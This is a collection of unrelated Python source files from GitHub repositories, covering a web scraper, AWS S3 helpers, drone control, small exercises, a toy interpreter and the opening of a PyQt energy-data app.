Node(data)\n","repo_name":"bolusarz/Data-Structures","sub_path":"DoublyLinkedList/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17691102774","text":"import re\nimport time\nimport datetime\nfrom urllib.parse import urlencode\n\nfrom requests import Session\nfrom lxml import etree\n\nfrom utils import init_log, DBClass, get_settings, get_database, request\nfrom settings import headers, index_url, type_mappings\n\nlogger = init_log('my')\nDATABASE, TABLE = get_database()\nDOMAIN, CALCULATE_DATE, RUN_INTERVAL = get_settings()\nheaders['Host'] = re.search('//(.*?)(/|$)', DOMAIN).group(1)\nheaders['Origin'] = DOMAIN\nDB = DBClass(DATABASE, 'sqlserver')\n\n\nclass EvaluationRank(object):\n\n def __init__(self):\n self.session = Session()\n\n self.view_state = None\n self.view_state_generator = None\n self.event_validation = None\n\n def get_parm(self, text):\n self.view_state = re.search('id=\"__VIEWSTATE\" value=\"(.*?)\"', text).group(1)\n self.view_state_generator = re.search('id=\"__VIEWSTATEGENERATOR\" value=\"(.*?)\"', text).group(1)\n self.event_validation = re.search('id=\"__EVENTVALIDATION\" value=\"(.*?)\"', text).group(1)\n\n def parser(self, text: str, query_date: str, score_type: str):\n html = etree.HTML(text)\n\n for tr in html.xpath('//table[@id=\"gridView\"]//tr')[1:]:\n try:\n obj = {\n 'score_type': type_mappings.get(score_type),\n 'ranking': str(tr.xpath('./td[1]')[0].xpath(\"string(.)\")),\n 'company': str(tr.xpath('./td[2]/span/@title')[0]),\n 'organization_code': str(tr.xpath('./td[3]')[0].xpath(\"string(.)\")),\n 'credit_code': str(tr.xpath('./td[4]')[0].xpath(\"string(.)\")),\n 'normal_score': str(tr.xpath('./td[5]')[0].xpath(\"string(.)\")),\n 'promise_score': str(tr.xpath('./td[6]')[0].xpath(\"string(.)\")),\n 'quality_score': str(tr.xpath('./td[7]')[0].xpath(\"string(.)\")),\n 'total_score': str(tr.xpath('./td[8]')[0].xpath(\"string(.)\")),\n 'calculate_date': query_date\n }\n pk = DB.select_condition(\n TABLE,\n 'id',\n [\n ['score_type', '=', obj.get('score_type')],\n ['organization_code', '=', obj.get('organization_code')],\n ['calculate_date', '=', query_date]\n ]\n )\n if pk:\n DB.update_many(TABLE, [obj], [{'id': pk[0][0]}])\n else:\n DB.insert_many(TABLE, [obj])\n except Exception as e:\n logger.error(\n 'parser: query_date={} score_type={} 错误={}'.format(\n query_date, type_mappings.get(score_type), str(e)))\n\n def get_total_page(self, now_date: str, query_date: str, score_type: str) -> int:\n data = {\n '__EVENTTARGET': 'linkBtnQuery',\n '__EVENTARGUMENT': '',\n '__LASTFOCUS': '',\n '__VIEWSTATE': self.view_state,\n '__VIEWSTATEGENERATOR': self.view_state_generator,\n '__VIEWSTATEENCRYPTED': '',\n '__EVENTVALIDATION': self.event_validation,\n 'head1$nowtime': now_date,\n 'id': '',\n 'datetime': '',\n 'FSTYPE': '',\n 'a': score_type,\n 'txtcsepname': '',\n 'txtcsepcode': '',\n 'txtSCOREDATE': query_date,\n 'ddl': 1\n }\n data = urlencode(data).replace(\"+\", \"%2B\").replace(\"/\", \"%2F\").encode('utf8')\n response, status_code = request(self.session, DOMAIN + index_url.format(now_date), 'post', headers,\n data=data)\n self.get_parm(response.text)\n html = etree.HTML(response.text)\n total_page = html.xpath('//span[@id=\"lblpagecount\"]')[0].xpath(\"string(.)\")\n return int(total_page)\n\n def get_html(self, now_date: str, query_date: str, score_type: str, ddl: int):\n print('开始扫描 计算日期={} 类型={} 页数={}'.format(query_date, type_mappings.get(score_type), ddl))\n logger.info('开始扫描 计算日期={} 类型={} 页数={}'.format(query_date, type_mappings.get(score_type), ddl))\n try:\n data = {\n '__EVENTTARGET': 'ddl',\n '__EVENTARGUMENT': '',\n '__LASTFOCUS': '',\n '__VIEWSTATE': self.view_state,\n '__VIEWSTATEGENERATOR': self.view_state_generator,\n '__VIEWSTATEENCRYPTED': '',\n '__EVENTVALIDATION': self.event_validation,\n 'head1$nowtime': now_date,\n 'id': '',\n 'datetime': '',\n 'FSTYPE': '',\n 'a': score_type,\n 'txtcsepname': '',\n 'txtcsepcode': '',\n 'txtSCOREDATE': query_date,\n 'ddl': ddl\n }\n data = urlencode(data).replace(\"+\", \"%2B\").replace(\"/\", \"%2F\").encode('utf8')\n response, status_code = request(self.session, DOMAIN + index_url.format(now_date), 'post', headers,\n data=data)\n response.encoding = 'gbk'\n self.get_parm(response.text)\n self.parser(response.text, query_date, score_type)\n except Exception as e:\n print(e)\n logger.error(\n '开始扫描 计算日期={} 类型={} 页数={} 错误={}'.format(query_date, type_mappings.get(score_type), ddl, str(e)))\n\n def run(self):\n date_start = datetime.datetime.strptime(CALCULATE_DATE, '%Y-%m-%d')\n date_end = datetime.datetime.now()\n now_date = date_end.strftime('%Y-%m-%d')\n while date_start <= date_end:\n query_date = date_start.strftime('%Y-%m-%d')\n for score_type in type_mappings:\n response, status_code = request(self.session, DOMAIN + index_url.format(now_date), 'get', headers)\n self.get_parm(response.text) # 刷新参数__VIEWSTATE/__VIEWSTATEGENERATOR/__EVENTVALIDATION\n total_page = self.get_total_page(now_date, query_date, score_type)\n for n in range(1, total_page + 1):\n self.get_html(now_date, query_date, score_type, n)\n date_start += datetime.timedelta(days=1)\n\n\ndef main():\n if RUN_INTERVAL:\n while True:\n try:\n EvaluationRank().run()\n except Exception as e:\n print(e)\n finally:\n time.sleep(60 * 60 * int(RUN_INTERVAL))\n else:\n EvaluationRank().run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"star1986xk/HC_evaluation_rank","sub_path":"信用评价_今日排名.py","file_name":"信用评价_今日排名.py","file_ext":"py","file_size_in_byte":6664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21845283154","text":"import numpy as np\nfrom sklearn.metrics import confusion_matrix\n\n\ndef compute_iou(y_pred, y_true):\n labels = [0, 1, 2, 3, 4, 5, 6, 7]\n current = confusion_matrix(y_true, y_pred, labels=labels)\n intersection = np.diag(current)\n ground_truth_set = current.sum(axis=1)\n predicted_set = current.sum(axis=0)\n union = ground_truth_set + predicted_set - intersection\n iou = intersection / union.astype(np.float32)\n return np.mean(iou)","repo_name":"Subrata132/image-segmentaion-unet","sub_path":"metrics/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11387558454","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\n\nroot_directory = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(root_directory, \"README.md\"), encoding = \"utf-8\") as file_handle:\n long_description = \"\\n\" + file_handle.read()\n \nVERSION = \"0.2.0\"\nDESCRIPTION = \"Hagstrom Electronics key/mouse emulator interface\"\nLONG_DESCRIPTION = \"Abstraction module for Hagstrom Electronics usbtousb key/mouse emulators\"\n\nsetup(\n name = \"hagstrom\",\n version = VERSION,\n author = \"xiuxiu62 (Justin Cremer)\",\n author_email = \"\",\n description = DESCRIPTION,\n long_description = LONG_DESCRIPTION,\n long_description_content_type = \"text/markdown\",\n url = \"https://github.com/xiuxiu62/lib-hagstrom\",\n packages = find_packages(),\n classifiers = [\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ]\n)\n","repo_name":"xiuxiu62/lib-hagstrom","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25940781326","text":"import sys\n\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\n\nA = list(map(int, input().split()))\nlp, rp = 0, 0\nans = 0\n\ntmp_sum = A[0]\n\nwhile True:\n if tmp_sum == M:\n ans += 1\n if rp == N - 1:\n break\n else:\n tmp_sum -= A[lp] - A[rp + 1]\n lp += 1\n rp += 1\n elif tmp_sum < M:\n if rp == N - 1:\n break\n else:\n rp += 1\n tmp_sum += A[rp]\n elif lp < rp:\n tmp_sum -= A[lp]\n lp += 1\n else:\n if rp == N - 1:\n break\n else:\n tmp_sum -= A[lp] - A[rp + 1]\n lp += 1\n rp += 1\n\nprint(ans)\n","repo_name":"hyunsik96/problem-solving","sub_path":"필수문항/40_수들의합.py","file_name":"40_수들의합.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15536630671","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 29 15:46:01 2014\n\n@author: aastha\n\"\"\"\n\nimport json\nimport pprint\n\npath=\"/Users/aastha/Desktop/Semester3/Data Mining/CourseProject/Data/tweets.txt\"\nlogfilepath=\"/Users/aastha/Desktop/Semester3/Data Mining/CourseProject/Data/Formattedtweets.txt\"\nout_path=\"/Users/aastha/Desktop/Semester3/Data Mining/CourseProject/Data/TwitterFields.csv\"\n\ndata = []\nwith open(path) as f:\n for line in f:\n data.append(json.loads(line))\n\nlogfile=open(logfilepath,'w')\npprint.pprint(data,logfile)\n\ncreation_time=\"\"\nactual_creation=\"\"\nactual_favcount=\"\"\nactual_user_id=\"\"\nactual_user_screenname=\"\"\nhashtag=\"\"\nretweet_count = \"\" \nfav_count=\"\"\nreplyto= \"\"\ntext = \"\"\nuser_screenname=\"\"\nuser_screenname=\"\"\n\nout_file=open(out_path,'w')\nout_file.write(\"creation_time, actual_creation, actual_favcount, actual_user_id, actual_user_screenname, hashtag, retweet_count,fav_count, replyto, text, user_screenname, user_id\\n\")\n\nfor i in range(len(data)):\n #if we do not have creation time, then we can skip that tweet and all other fields about it \n if data[i].has_key('created_at'):\n creation_time=data[i]['created_at']\n else:\n continue\n if(data[i].has_key('retweeted_status')):\n #retweet status (we need to keep track if it SBT) \n actual_creation=data[i]['retweeted_status']['created_at']\n actual_favcount=data[i]['retweeted_status']['favorite_count']\n actual_user_id=data[i]['retweeted_status']['user']['id_str']\n actual_user_screenname=data[i]['retweeted_status']['user']['screen_name']\n \n #more Tweet information\n if(data[i]['entities'].has_key('hashtags')):\n if(len(data[i]['entities']['hashtags'])>0):\n hashtag= data[i][u'entities'][u'hashtags'][0]['text']\n #url1= data[i][u'entities'][u'media'][0][u'expanded_url']\n #url2= data[i][u'entities'][u'media'][0][u'url']\n retweet_count = data[i]['retweet_count'] \n fav_count=data[i]['favorite_count']\n replyto= data[i]['in_reply_to_screen_name']\n text = data[i][u'text'].replace(',','')\n text = text.replace('\\n','')\n text = text.replace('\\r','')\n\n #user information (to know what each individual user is doing)\n user_screenname=data[i]['user']['screen_name']\n user_id=data[i]['user']['id_str'] \n out_file.write('%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\\n'% (creation_time, actual_creation, actual_favcount, actual_user_id, actual_user_screenname, hashtag, retweet_count,fav_count, replyto, text, user_screenname, user_id)) \n \nout_file.flush()\nout_file.close()\n","repo_name":"abitofalchemy/DmChallenge","sub_path":"Scripts/Aastha/DecodeData.py","file_name":"DecodeData.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16360628704","text":"import socket\nimport sys\n\nsender = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\nhost = sys.argv[1]\nport = 12345\nbuf = 1024\n\naddr = (host,port)\nfileName = sys.argv[2]\nprint((\"{}\").format(fileName))\nfileNameb=bytes(fileName,'utf-8')\nsender.sendto(fileNameb,addr)\n\nf = open(fileName,\"rb\")\ndata = f.read(buf)\nprint((\"Data:{}\").format(data)) \n#byt = bytes(data,\"utf-8\")\nwhile data:\n if(sender.sendto(data,addr)):\n print(\"Sending\")\n data = f.read(buf)\n #byt = byte(data,\"utf-8\")\n else:\n print(\"Finished Sending\")\n","repo_name":"KannanManism/Networking-Python","sub_path":"pythonUDPSocket/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41485721049","text":"import os\nimport logging\nimport json\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom boto3.s3.transfer import TransferConfig\nimport requests\n\nbucket_name = 'myfiles07'\n\ndef upload_file(file_name, bucket, object_name=None):\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = os.path.basename(file_name)\n\n # Upload the file\n s3_client = boto3.client('s3')\n try:\n response = s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n# upload_file(\"./data.json\", bucket_name, \"data.json\")\n\ndef delete_non_empty_bucket(bucket):\n s3_client = s3 = boto3.resource('s3') \n bucketClient = s3_client.Bucket(bucket)\n bucketClient.objects.all().delete()\n bucketClient.meta.client.delete_bucket(Bucket=bucket)\n#delete_non_empty_bucket(bucket_name)\n\ndef delete_object(bucket,object_name):\n s3_client = boto3.client('s3')\n response = s3_client.delete_object(Bucket=bucket,Key=object_name)\n print(response)\ndelete_object(bucket_name, \"data.json\")\n\nimport json\nimport boto3\n\n\ns3 = boto3.client('s3')\n\ndef lambda_handler(event, context):\n source_bucket = event['Records'][0]['s3']['bucket']['name']\n object_key = event['Records'][0]['s3']['object']['key']\n target_bucket = 'myfiles08'\n copy_source = {'Bucket': source_bucket, 'Key': object_key}\n print (\"Source bucket : \", source_bucket)\n print (\"Target bucket : \", target_bucket)\n try:\n waiter = s3.get_waiter('object_exists')\n waiter.wait(Bucket=source_bucket, Key=object_key)\n s3.copy_object(Bucket=target_bucket, Key=object_key, CopySource=copy_source)\n return {\n 'statusCode': 200,\n 'body': json.dumps('File has been Successfully Copied')\n }\n except Exception as err:\n print (\"Error -\"+str(err))\n return err","repo_name":"mukeshmk7/AWS","sub_path":"S3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5807842094","text":"import KeyPresscontrol as kp\nfrom djitellopy import tello\nfrom time import sleep\nimport cv2\n\ndef get_keyboard_input():\n lr,fb,ud,yv = 0,0,0,0\n speed = 50\n if kp.get_key(\"LEFT\"): lr = -speed\n elif kp.get_key(\"RIGHT\"): lr = speed\n if kp.get_key(\"UP\"):\n fb = speed\n elif kp.get_key(\"DOWN\"):\n fb = -speed\n if kp.get_key(\"w\"):\n ud = speed\n elif kp.get_key(\"s\"):\n ud = -speed\n if kp.get_key(\"a\"):\n yv = speed\n elif kp.get_key(\"d\"):\n yv = -speed\n if kp.get_key(\"q\"): mytello.land()\n if kp.get_key(\"e\"): mytello.takeoff()\n\n return [lr,fb,ud,yv]\nif __name__ == '__main__':\n\n kp.init()\n\n mytello = tello.Tello()\n mytello.connect()\n print(mytello.get_battery())\n\n mytello.streamon()\n\n while True:\n img = mytello.get_frame_read().frame\n img = cv2.resize(img,(360,240))\n cv2.imshow('image',img)\n values = get_keyboard_input()\n mytello.send_rc_control(values[0],values[1],values[2],values[3])\n cv2.waitKey(1)\n\n\n","repo_name":"zhz03/Tellodrone_project","sub_path":"tellodrone_basic/image_control.py","file_name":"image_control.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37642517975","text":"import pprint\n\nmsg = \"This is a bright summer day. Everthing supposed to go fine\"\ncount = {}\n\nfor char in msg:\n count.setdefault(char, 0)\n count[char] += 1\n\nprint(count)\npprint.pprint(count)\n","repo_name":"rahulgoyal01/PyPractice","sub_path":"ATBS Udemy/Lessons practice/String List and same/charCount.py","file_name":"charCount.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3777462452","text":"output = []\n\ndef error(n, msg):\n\toutput.append(f\"ERROR LINE [{n + 1}]: {msg}\")\n\ndef interpret(syntax, content):\n\tglobal output\n\toutput = []\n\n\tvariables = {}\n\n\t# Replace math symbols with \"proper\" math symbols\n\tcontent = content.replace(syntax.operator[\"add\"], \"+\")\n\tcontent = content.replace(syntax.operator[\"sub\"], \"-\")\n\tcontent = content.replace(syntax.operator[\"mul\"], \"*\")\n\tcontent = content.replace(syntax.operator[\"div\"], \"/\")\n\tcontent = content.replace(syntax.operator[\"mod\"], \"%\")\n\tcontent = content.replace(syntax.print[\"open\"], f'{syntax.print[\"open\"]} ')\n\tcontent = content.replace(syntax.print[\"close\"], f' {syntax.print[\"close\"]}')\n\n\tlines = content.split(\"\\n\")\n\n\tfor i, line in enumerate(lines):\n\t\tline = line.strip()\n\t\twords = line.split(\" \")\n\t\t\n\t\tfor word in range(len(words)):\n\t\t\twords[word] = words[word].strip()\n\n\t\t# Get Variables\n\t\tif len(words) > 3:\n\t\t\tif words[0] == syntax.variable[\"prefix\"]:\n\t\t\t\tif words[2] == syntax.variable[\"assign\"]:\n\t\t\t\t\tvalue = line[line.find(f' {syntax.variable[\"assign\"]}') + len(syntax.variable[\"assign\"]) + 1:].strip()\n\n\t\t\t\t\tvariables[words[1]] = value\n\t\t\t\telse:\n\t\t\t\t\terror(i, f'You did not assign the variable with: {syntax.variable[\"assign\"]}')\n\t\t\t\t\tcontinue\n\n\t\t# Replace Variables\n\t\tfor j, word in enumerate(words):\n\t\t\tif word in variables:\n\t\t\t\twords[j] = variables[word]\n\n\t\t# Print\n\t\tif words[0] == syntax.print[\"open\"]:\n\t\t\tif words[-1] == syntax.print[\"close\"]:\n\t\t\t\ttext = \" \".join(words[1:-1]).strip()\n\n\t\t\t\tif len(words) == 2 or len(text) == 0:\n\t\t\t\t\toutput.append(\"\\n\")\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Math\n\t\t\t\tmath = False\n\t\t\t\tfor x in range(0, 10):\n\t\t\t\t\tif str(x) in text:\n\t\t\t\t\t\tmath = True\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tresult = eval(text)\n\t\t\t\t\t\t\toutput.append(result)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\terror(i, \"Invalid math. Make sure it matches your syntax or that the variables exists\")\n\t\t\t\t\t\tbreak\n\t\t\t\tif math:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# String\n\t\t\t\tif len(text) >= 2:\n\t\t\t\t\tif text[0] == '\"' and text[-1] == '\"':\n\t\t\t\t\t\toutput.append(text[1:-1])\n\t\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\terror(i, 'Unknown variable(s) (put \"double quotes\" around the text to print directly)')\n\n\t\t\telse:\n\t\t\t\terror(i, f'`{syntax.print[\"open\"]}` is not closed with `{syntax.print[\"close\"]}`')\n\t\t\t\tcontinue\n\n\treturn output\n","repo_name":"BenStigsen/Programming-Webapplication","sub_path":"interpret.py","file_name":"interpret.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"7863935596","text":"# Bill\nprint(\"Welcome to the tip calculator!\")\n\nbill = input(\"What was total bill? $\")\nbill_as_float= float(bill)\n\ntip = input(\"What percentage tip would you like to give? 10, 12 or 15? \")\ntip_as_int = int(tip)\n\npeople = input(\"How many people split the bill? \")\npeople_as_int = int(people)\n\ntip_as_percent = tip_as_int/100\ntotal_tip_amount = bill_as_float * tip_as_percent\nbill_total = total_tip_amount + bill_as_float\nbill_per_person = bill_total / people_as_int\nfinal_amount = round(bill_per_person, 2)\n\nprint(f\"Each person should pay: ${final_amount}\")","repo_name":"leatuan021211/100DaysToLearnPython","sub_path":"Day-2/Video11Day2.py","file_name":"Video11Day2.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11843607767","text":"# 练习2:根据月份计算天数。\nmonth = int(input(\"请输入月份:\"))\nday_of_month = (31,28,31,30,31,30,31,31,30,31,30,31)\nmonth1 = (2,)\nmonth2 = (4,6,9,11)\nmonth3 = (1,3,5,7,8,10,12)\nif month in month1:\n print(\"28\")\nelif month in month2:\n print(\"30\")\nelif month in month3:\n print(\"31\")\nelse:\n print(\"error month\")\n\nprint(day_of_month[month-1])","repo_name":"ShijieLiu-PR/Python_Learning","sub_path":"month01/python base/day05/exercise02.py","file_name":"exercise02.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15312190609","text":"from Classes.Inheritance.class_example57 import Person\n\nclass MITPerson(Person):\n \"\"\"This class describes about the person from MIT\"\"\"\n nextIdnum = 0\n\n def __init__(self, name):\n Person.__init__(self, name)\n self.Idnum = MITPerson.nextIdnum\n MITPerson.nextIdnum+=1\n\n def getIdNum(self):\n \"\"\"This returns the MIT ID num\"\"\"\n return self.Idnum\n\n def __lt__(self, other):\n \"\"\"Return whose Id is first\"\"\"\n return self.Idnum < other.Idnum\n\n def speak(self, utterance):\n return (self.getLastName()+\" says:\"+utterance)\n\np1 = MITPerson('Eric')\np2 = MITPerson('John Gutag')\np3 = MITPerson('John Smith')\np4 = Person('John')\n\nif __name__ == '__main__':\n p1 = MITPerson('Mark Zukerberg')\n p1.setBirthday(1984,5,14)\n p2 = MITPerson('Drew Houston')\n p2.setBirthday(1983,4,3)\n p3 = Person('Travis Kalanik')\n p4 = Person('Steve Woznaik')\n personlist = [p1,p2,p3,p4]\n for person in personlist:\n print(person)\n personlist.sort()\n print()\n for person in personlist:\n print(person)\n","repo_name":"gsudarshan1990/Training_Projects","sub_path":"Classes/Inheritance/class_example58.py","file_name":"class_example58.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37625576430","text":"#!/usr/bin/env python3\nfrom PyQt5 import uic, QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import Qt ,QRectF, QSize, QTimer, QDate\nfrom PyQt5.QtGui import QPainter, QPixmap, QPen, QFont, QImage, QIcon, QColor\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QGraphicsObject, QGraphicsView, QGraphicsScene, QDesktopWidget, QDialog, QGraphicsTextItem\nimport numpy as np\nimport time\nimport os\nimport json\nfrom settings import *\nfrom datetime import date\nimport openpyxl\nfrom load_energo_files import *\n\nif os.name == 'nt':\n import mysql.connector\nelse:\n import pymysql\n\nfrom datetime import datetime, timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom calendar import monthrange\n\n\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as Canvas\nfrom matplotlib.figure import Figure\n\nimport matplotlib.pyplot as plt\n\n\nh2hour_label = ['00:30', '01:00', '01:30', '02:00', '02:30', '03:00', '03:30', '04:00', '04:30', '05:00', '05:30', '06:00', '06:30', '07:00', '07:30', '08:00', '08:30', '09:00', '09:30', '10:00', '10:30', '11:00', '11:30', '12:00', '12:30', '13:00', '13:30', '14:00', '14:30', '15:00', '15:30', '16:00', '16:30', '17:00', '17:30', '18:00', '18:30', '19:00', '19:30', '20:00', '20:30', '21:00', '21:30', '22:00', '22:30', '23:00', '23:30', '00:00']\n\nmonths_label = ['Січень\\n01', 'Лютий\\n02', 'Березень\\n03', 'Квітень\\n04', 'Травень\\n05', 'Червень\\n06', 'Липень\\n07', 'Серпень\\n08', 'Вересень\\n09', 'Жовтень\\n10', 'Литопад\\n11', 'Грудень\\n12']\nmonths_xls = ['', 'січень', 'лютий', 'березень', 'квітень', 'травень', 'червень', 'липень', 'серпень', 'вересень', 'жовтень', 'литопад', 'грудень']\nmonths_xlsR = ['', 'січня', 'лютого', 'березеня', 'квітня', 'травня', 'червня', 'липня', 'серпня', 'вересня', 'жовтня', 'литопада', 'грудня']\n\n\nForm_main, _ = uic.loadUiType ( pathUI + '/' + \"main.ui\" )\nForm_date, _ = uic.loadUiType ( pathUI + '/' + \"date.ui\" )\nForm_about, _ = uic.loadUiType ( pathUI + '/' + \"about.ui\" )\nForm_error, _ = uic.loadUiType ( pathUI + '/' + \"error.ui\" )\nForm_ok, _ = uic.loadUiType ( pathUI + '/' + \"ok.ui\" )\nForm_que, _ = uic.loadUiType ( pathUI + '/' + \"que.ui\" )\n\n\n\nclass MatplotlibWidget(Canvas):\n def __init__(self, parent=None, title='', xlabel='', ylabel='', dpi=80, hold=False):\n super(MatplotlibWidget, self).__init__(Figure())\n self.setParent(parent)\n self.title = title\n self.xlabel = xlabel\n self.ylabel = ylabel\n self.figure = Figure(dpi=dpi)\n self.canvas = Canvas(self.figure)\n self.theplot = self.figure.add_subplot(111)\n\n\n def plotData(self, x, y, rotation=False):\n self.theplot.set_title(self.title)\n self.theplot.set_xlabel(self.xlabel)\n self.theplot.set_ylabel(self.ylabel)\n \n self.theplot.spines['top'].set_visible(False)\n self.theplot.spines['right'].set_visible(False)\n self.theplot.spines['left'].set_visible(False)\n self.theplot.spines['bottom'].set_color('#DDDDDD')\n self.theplot.tick_params(bottom=False, left=False)\n self.theplot.set_axisbelow(True)\n self.theplot.yaxis.grid(True, color='#EEEEEE')\n self.theplot.xaxis.grid(False)\n \n self.theplot.bar(x,y)\n self.draw_idle()\n# print(y)\n for x,y in zip(x,y):\n if y:\n label = \"{:.0f}\".format(y)\n else:\n label = ''\n self.theplot.annotate(label,\n (x, y),\n textcoords=\"offset points\",\n xytext=(1, 5),\n ha='center',\n va='bottom',\n rotation=90)\n\n if rotation:\n for rotation in self.theplot.get_xticklabels():\n rotation.set_rotation(90)\n\n\n def plotClear(self):\n self.theplot.clear()\n\n\n\n\nclass MatplotlibWidgetDiff(Canvas):\n def __init__(self, parent=None, title='', xlabel='', ylabel='', dpi=80, hold=False):\n super(MatplotlibWidgetDiff, self).__init__(Figure())\n self.setParent(parent)\n self.wBox = 0.35\n self.title = title\n self.xlabel = xlabel\n self.ylabel = ylabel\n self.figure = Figure(dpi=dpi)\n self.canvas = Canvas(self.figure)\n self.theplot = self.figure.add_subplot(111)\n\n\n def plotData(self, x, y, y2, year=0, year2=0):\n xnumber = np.arange(len(x))\n self.theplot.set_title(self.title)\n self.theplot.set_xlabel(self.xlabel)\n self.theplot.set_ylabel(self.ylabel)\n self.theplot.set_xticks(xnumber)\n self.theplot.set_xticklabels(x)\n self.theplot.spines['top'].set_visible(False)\n self.theplot.spines['right'].set_visible(False)\n self.theplot.spines['left'].set_visible(False)\n self.theplot.spines['bottom'].set_color('#DDDDDD')\n self.theplot.tick_params(bottom=False, left=False)\n self.theplot.set_axisbelow(True)\n self.theplot.yaxis.grid(True, color='#EEEEEE')\n self.theplot.xaxis.grid(False)\n self.rects1 = self.theplot.bar(xnumber - self.wBox/2, y, self.wBox, label=year)\n self.rects2 = self.theplot.bar(xnumber + self.wBox/2, y2, self.wBox, label=year2)\n self.draw_idle()\n self.autolabel(self.rects1)\n self.autolabel(self.rects2)\n if year:\n self.theplot.legend(loc='upper right', frameon=False)\n\n\n def plotClear(self):\n self.theplot.clear()\n\n\n def autolabel(self, rects):\n for rect in rects:\n height = rect.get_height()\n if height:\n label = '{:.0f}'.format(height)\n else:\n label = ''\n self.theplot.annotate(label,\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom', rotation=90)\n\n\n\n\n\nclass dateDialogUI(QDialog, Form_date):\n def __init__(self, parent=None):\n super(dateDialogUI, self).__init__(parent=parent)\n self.setupUi(self)\n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n\nclass aboutDialogUI(QDialog, Form_about):\n def __init__(self, parent=None):\n super(aboutDialogUI, self).__init__(parent=parent)\n self.setupUi(self)\n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n\nclass errorDialogUI(QDialog, Form_error):\n def __init__(self, parent=None):\n super(errorDialogUI, self).__init__(parent=parent)\n self.setupUi(self)\n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n\nclass okDialogUI(QDialog, Form_ok):\n def __init__(self, parent=None):\n super(okDialogUI, self).__init__(parent=parent)\n self.setupUi(self)\n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n\nclass queDialogUI(QDialog, Form_que):\n def __init__(self, parent=None):\n super(queDialogUI, self).__init__(parent=parent)\n self.setupUi(self)\n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n \n \n \nclass MAIN(QMainWindow, Form_main): \n def __init__(self):\n super(MAIN, self).__init__()\n self.setupUi(self)\n \n \n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n qtRectangle = self.frameGeometry()\n centerPoint = QDesktopWidget().availableGeometry().center()\n qtRectangle.moveCenter(centerPoint)\n self.move(qtRectangle.topLeft())\n\n self.sqlcon = None\n\n\n self.action_loadfile.triggered.connect(self.loadFile)\n self.action_loadfile.setShortcut(\"Ctrl+O\")\n self.action_loadfile.setIcon(QIcon(\"img/file.svg\"))\n\n self.action_savefile.triggered.connect(self.saveFile)\n self.action_savefile.setShortcut(\"Ctrl+S\")\n self.action_savefile.setIcon(QIcon(\"img/save.svg\")) \n\n self.action_update.triggered.connect(self.updateAll)\n self.action_update.setShortcut(\"F5\")\n self.action_update.setIcon(QIcon(\"img/update.svg\")) \n\n\n self.action_exit.triggered.connect(self.appquit)\n self.action_exit.setShortcut(\"Ctrl+Q\")\n self.action_exit.setIcon(QIcon(\"img/exit.svg\")) \n\n 